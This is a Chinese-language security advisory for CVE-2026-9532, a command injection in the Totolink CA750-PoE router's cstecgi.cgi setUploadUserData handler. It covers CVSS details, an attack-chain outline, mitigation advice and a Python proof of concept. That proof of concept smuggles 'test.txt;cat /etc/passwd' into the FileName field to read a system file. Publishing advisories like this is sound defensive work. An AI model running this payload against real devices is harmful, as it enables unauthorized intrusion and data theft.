IPBUF安全漏洞报告
English
CVE-2026-9532 CVSS 6.3 中危

CVE-2026-9532 Totolink CA750-PoE 命令注入漏洞

披露日期: 2026-05-26

漏洞信息

漏洞编号
CVE-2026-9532
漏洞类型
OS命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Totolink CA750-PoE

相关标签

OS命令注入RCETotolinkIoT漏洞路由器

漏洞概述

Totolink CA750-PoE路由器6.2c.510版本存在安全漏洞,位于/cgi-bin/cstecgi.cgi的设置处理程序中。由于setUploadUserData函数对FileName参数缺乏有效过滤,导致OS命令注入。攻击者可利用此缺陷远程执行恶意代码,窃取数据或破坏服务。

技术细节

该漏洞源于Totolink CA750-PoE设备Web管理接口组件的代码缺陷。具体位于/cgi-bin/cstecgi.cgi脚本的setUploadUserData函数。当处理用户上传请求时,程序未对FileName参数进行严格的边界检查和安全过滤,直接将其传递给系统命令执行环境。攻击者通过构造包含Shell元字符(如; | &)的特殊HTTP POST请求,即可欺骗后端执行任意操作系统命令。由于CVSS向量显示攻击复杂度低且无需用户交互,此漏洞具有极高的可利用性,允许低权限攻击者获得设备控制权。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别暴露的Totolink CA750-PoE设备及其Web管理接口。
STEP 2
2. 发送恶意请求
攻击者向/cgi-bin/cstecgi.cgi发送POST请求,在setUploadUserData函数的FileName参数中注入恶意Shell命令。
STEP 3
3. 命令执行
服务器端未过滤FileName参数,直接将其拼接到系统命令中执行,触发OS命令注入。
STEP 4
4. 获取权限
利用注入的命令,攻击者获取设备Shell权限,可读取敏感文件或进一步控制设备。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_ip): url = f"http://{target_ip}/cgi-bin/cstecgi.cgi" headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (compatible; ExploitBot/1.0)" } # Payload to inject a command (e.g., ping back or cat file) # Using a semicolon to chain commands in the FileName parameter malicious_filename = "test.txt;cat /etc/passwd" data = { "function": "setUploadUserData", "FileName": malicious_filename } try: response = requests.post(url, headers=headers, data=data, timeout=5) print(f"[+] Payload sent to {target_ip}") print(f"[+] Response status: {response.status_code}") print(f"[+] Response body: {response.text}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "192.168.0.1" # Replace with target IP exploit(target)

影响范围

Totolink CA750-PoE 6.2c.510

防御指南

临时缓解措施
建议用户立即断开受影响设备的外网连接,并通过防火墙规则仅允许受信任的内网IP访问管理端口。同时,应密切关注厂商官网发布的安全更新,并在第一时间进行固件升级以修补此漏洞。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表